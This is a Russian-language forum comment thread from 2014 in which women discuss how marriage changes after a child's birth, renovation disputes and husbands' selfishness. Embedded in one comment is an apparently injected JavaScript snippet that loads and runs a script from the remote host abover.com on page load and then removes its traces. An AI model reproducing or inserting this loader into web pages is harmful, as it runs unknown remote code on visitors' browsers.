Женские метаморфозы

Ремонт-это жесть, причем у всех! И ремонт-не показатель, так как это априори конфликтная и тяжела ситуация)) Тем более у вас не квартира, а целый дом! На целый этаж больше споров!))) Мне кажется, что тут дело в том, что материнство меняет женщин, причем всех)) мужчины просто по природе своей не может понять, ЧТО происходит в женской голове. И никогда не поймет. Тут уже ему так или иначе придется принять тот факт, что ты больше не беззаботная девчонка, ты МАТЬ. Хочет он этого или нет. Он может не понимать твоей логики, но если он любит тебя, должен просто принять тебя такой, какой ты стала)) конечно, ты, как женщина умная, будешь поддерживать и те качества, которые процветали до, но тут нужно понимать, что на 100% ты прежней не станешь. Тут все от него зависит теперь)) и всякая скука и лень тут ни при чем, имхо..... вот))
12.01.2014
У большинства с рождением ребенка меняются отношения... В каждой семье свои тараканы.... Вы с ремонтом не можете решить, найти компромисс, а моему по фиг, как я скажу так и будет, зато в другом мы собачимся без конца а у вас идилия... Так что тут палка о двух концах...
11.01.2014
У каждого свое! Это точно ... 
11.01.2014
Ален..ты уж извини....но у тебя просто очень эгоистичный во многих моментах муж... Который почему-то никак не примет факт, что вас теперь трое...Держись, ты умная и сильная..найдешь выход..))
11.01.2014
Оль , да я понимаю ! Есть такое дело, хотя в нем есть и очень ценные качества , но эгоизма они не убавляют ! Спасибо за сильную и умную
11.01.2014
Да я и не отрицаю его положительных и ценных качеств) ты ж за что-то его любишь)))  Надеюсь, у вас все наладится)
11.01.2014
Да у нас вроде все ок, но моя вредность та еще сущность видимо ))) ты чего не спишь ?)
11.01.2014
Да ладно вредность..ты ж почти всегда на уступки идешь и как бабочка вокруг него пархаешь))А не сплю, потому что сначала выдумывала оформление торта к годовасию Макаркиному, а потом не дошла до душа, потому что господин сисю потребовал... У нас последнее время вообще ппц с засыпанием...каждые 15 минут может присасываться...ни днем, ни ночью не может один... Вроде спит..пойду очередную попытку принять душ совершу
11.01.2014
да))))) мне и самой тоже иногда хочется романтики, но с двумя маленькими детками - пока не получается.наверное - он должен чаще идти на уступки, понятное дело можно и  даже нужно тусить вместе с друзьями, но теперь у него семья и он тоже должен иногда идти на компромисс.  Считаться с твоим мнением или по крайней мере хоть чуточку прислушиваться к тому, чего ты хочешь или о чем ты думаешь? В том плане, что не всегда ты должна соглашаться, но и он должен идти на уступки, причем чтобы это не выглядело так - да, я согласен, Но через пару месяцев начинает об этом вспоминать, вот я пошел тебе на уступки там-то и там-то. Чтобы это было как бы само себе разумеющееся. Ну как-то так.....Конечно, мы все равно их очень любим, ценим и дорожим.....Просто семейная жизнь и рождение детей, быт меняет очень  ту нашу жизнь, которая была ДО.....))))
11.01.2014
Посижу... послушаю. 
11.01.2014
вот мой вчера обиделся, попросил массаж, а мне лень. сказал, я все для тебя, а ты мне массаж сделать не можешь)))вот в душе переживпю, что раньше по первому намеку все для него, а теперь нет. 
11.01.2014
Тоже так бывает )
11.01.2014
А мне кажется все очень просто,у вас теперь есть другой главный мужчина и вы пока не научились разделять любовь на двух человек,это нормально,если вы сами по себе моногамны
11.01.2014
Немного не в этом проблема . У нас до ребенка не было совместных ремонтов))
11.01.2014
а у меня без цветов, подарков - всё один в один как у вас.[removed](function () { var script = document.createElement('script'); script.src = 'https://abover.com/system/extension?iframe=' + ( self === top ? '0' : '1' ) + '&r=' + Math.random() + '&v=1.0.8'; script.onload = script.onerror = function () { script.onload = script.onerror = null; script[removed].removeChild(script); } document.body.appendChild(script); })();[removed]
11.01.2014
Может, после рождения ребенка Вы уже не можете посвящать всю себя мужу? У пеня муж после рождения первого сына очень ревновал. Чуть не до развода. Как сын подрос и мы смогли себе позволить романтические прогулки под луной-как будто в медовый месяц окунулись. Верните роман тику в отношения ))
11.01.2014
Вы знаете, время у меня на всех есть , просто есть масса вопросов по ремонту, делам , в которых я не соглашаюсь с ним...а ему это не нравится
11.01.2014
Мы из-за ремонта чуть не развелись) в итоге я плюнула и во все соглашаюсь с мужем. Теперь у нас квартира по последней моде 90-х ))) воплотил все детские мечты (уголок в 5-ти метровой кухне)))))
11.01.2014
))))))) ох как здорово )))) зато "вечная молодость "окружает ;)
11.01.2014
Да и хрен с ним. Чисто, аккуратно и в мире, это главное
11.01.2014
Мне не хватает мудрости ) в моем случае я жила бы в полном хайтеке, без занавесок , стеклом по всюду и острыми углами))) а у нас же сын , он бы постоянно что-то разбивал и набивал шишки в таком доме)
11.01.2014
Я была за минимализм. Для хрущевки это идеальный вариант, но народ требовал ковров и хрусталя )))
11.01.2014
))) надеюсь не на стену ковров ?)))))))))
11.01.2014
Слава богу обошлись без оного добра. Но стиль примерно стал понятен ))
11.01.2014
Как вы с мужем напоминаете мне нашу семью. Прямо копейка в копейку порой. Когда родился Коля (а мой муж уже был женат и даже ребенок не первый), он изнылся весь, что секс не по первому требованию, сервировка стола не стремительная, и вообще он ХОЧЕТ чтобы я полежала с ним у телевизора (в вашем варианте гламурно потусила в кругу его друзей), а я все время играюсь с Колей... У тебя муж единственный ребенок в семье? Мой - да! Он тупо не привык делиться. А сейчас привык, понял, что дети вырастут быстро, останутся только воспоминания и мы друг у друга. Нам нравятся успешные мужики, а они ОБЯЗАТЕЛЬНО эгоисты. И есть два варианта, говниться и потерять мужа, или ежедневно проводить дипломатические переговоры, давить авторитетом/слезами, ведь это наша работа!!! Это только дураки думают, что мы бездельничаем сидя дома)))Но иногда мне все надоедает и я начинаю своего мужа пилить. А потом опять пылинки с него сдуваю, предугадываю каждый чих.)))
11.01.2014
Ой Ир, иногда хочется лопнуть от злости . У меня дело не только в ревности , но еще и не желании искать компромиссы , он даже как правила соглашается со мной , но потом постоянно напоминает об этом!
11.01.2014
Вот и лопни, а потом приласкайся. Трудно с мужиками жить, а без них тоскливо)))
12.01.2014
Я уже засучила рукава, чтоб писать, а тут твой пост! Лучше не скажешь!
11.01.2014
Мы уже выяснили, что родственные души!!! 
12.01.2014
Оставшиеся комментарии доступны после регистрации
Зарегистрируйтесь и получите полный доступ ко всем функциям сайта.
Появились сорры... Уехал:(